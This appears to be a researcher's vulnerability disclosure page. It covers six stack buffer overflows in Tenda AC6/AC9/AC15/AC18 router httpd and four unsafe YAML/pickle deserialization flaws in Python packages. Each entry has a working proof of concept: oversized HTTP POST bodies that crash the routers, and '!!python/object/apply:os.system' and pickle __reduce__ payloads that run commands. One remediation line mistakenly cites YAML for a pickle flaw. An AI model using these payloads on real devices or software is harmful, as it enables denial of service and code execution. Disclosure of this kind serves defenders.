CVE-2020-13394: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13394    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the list parameter for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
POST /goform/*********** HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: password=qpl5gk

list=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13393: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13393    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the deviceId and time parameters for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=pyl5gk

deviceId=&time=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13392: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13392    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the funcpara1parameter for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /goform/********** HTTP/1.1  
Host: 192.168.18.131  
Accept:  */*  
X-Requested-With:  XMLHttpRequest  
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5)   AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100   Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding:  gzip, deflate  
Accept-Language:  en-US,en;q=0.9  
Connection: close  
Content-Type: text/plain  
Cookie: password=ioo5gk  

save=1&msgname=1&funcname=save_list_data&funcpara1=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&funcpara2=222222222222222222222222  

Details

ARM

MIPS

CVE-2020-13391: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13391    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the speed_dir parameter for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
POST /goform/SetSpeedWan HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: password=jgi5gk

speed_dir=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13390: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13390    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the entrys and mitInterface parameters for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /goform/addressNat HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=whz5gk

entrys=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&mitInterface=1111111&page=11111111

Details

ARM

MIPS

CVE-2020-13389: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13389    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the schedStartTime and schedEndTime parameters for a post request, the value is directly used in a strcpy to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=nrt5gk

schedWifiEnable=0&schedStartTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&schedEndTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13388:vulnerability in jw.util

Python Package:  jw.util

Version:      <= 2.3 

Reported by:       Joel

CVE-2020-13388    CVE_details

Overview

An exploitable vulnerability exists in the configuration loading functionality of jw.util before 2.3. Configuration is a module for handling configurations from a YAML source and a class for simplifying access to a configuration tree. Load configuration from stream with YAML can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.

POC

1
2
3
from jw.util import configuration
configuration.FromString('!!python/object/apply:os.system ["calc.exe"]')
configuration.FromStream('!!python/object/apply:os.system ["calc.exe"]')

Remediation

It should use yaml.safe_load to parse yaml file.

CVE-2018-14572: Vulnerability in Conference-scheduler-cli

Python Package:  conference-scheduler-cli

Version:      <= 0.10.1 

Published:    24 Jul 2018  

Reported by:       Joel

CVE-2018-14572    CVE_details

Overview

In conference-scheduler-cli, a pickle.load call on imported data allows remote attackers to execute arbitrary code via a crafted .pickle file, as demonstrated by Python code that contains an os.system call.

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
from scheduler import io
import os
from pathlib import Path
import pickle
class joel_test(object):
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, ('calc.exe',))
test = joel_test()
f=open('solution\\scheduler.pickle','wb')
pickle.dump(test,f)
f.close()
io.import_schedule_definition(Path(Path.cwd(), 'solution'))

Remediation

It should use yaml.safe_load to parse yaml file.

CVE-2017-16764: Vulnerability in Django_make_app

Python Package:  django_make_app

Version:      Before 0.1.3

Published:    Nov. 10 th. 2017

Reported by:       Joel

CVE-2017-16764    CVE_details

Overview

Django_make_app is Define models and fields using YAML and generate app for Django with views, forms, templates etc. An issue was discovered in the django_make_app package before 0.1.3.Untrusted data passed into the read_yaml_file function can execute arbitrary python commands resulting in command execution.

POC

1
2
3
from django_make_app.io_utils import read_yaml_file
yaml_raw_data = read_yaml_file('joel.yml')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]

Remediation

At present, manufacturers have not yet related repair patch. It should use yaml.safe_load to parse yaml file.

CVE-2017-16763: Configure Loaded Through Confire

Python Package:  confire

Version:      Before 0.2.0

Published:    Nov. 10th. 2017

Reported by:       Joel

CVE-2017-16763    CVE_details

Overview

Confire is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Due to the user specific configuration was loaded from ~/.confire.yaml usinig yaml.load(), an issue was discovered in the Confire package before 0.2.0.Untrusted data passed into the confire.yaml files can execute arbitrary python commands resulting in command execution.

POC

1
2
3
4
5
6
7
8
9
10
11
12
class MyConfig(Configuration):
  mysetting = True
  logpath   = "/var/log/myapp.log"
  appname   = "MyApp"
settings = MyConfig.load()
#CONF_PATHS = [
#'/etc/confire.yaml',                    # The global configuration
#os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#os.path.abspath('conf/confire.yaml')    # Local directory configuration
#    ]
#'~/.confire.yaml':!!python/object/apply:os.system ["calc.exe"]

Remediation

The updated versions of confire correctly use the yaml.safe_load method which prevents remote code execution.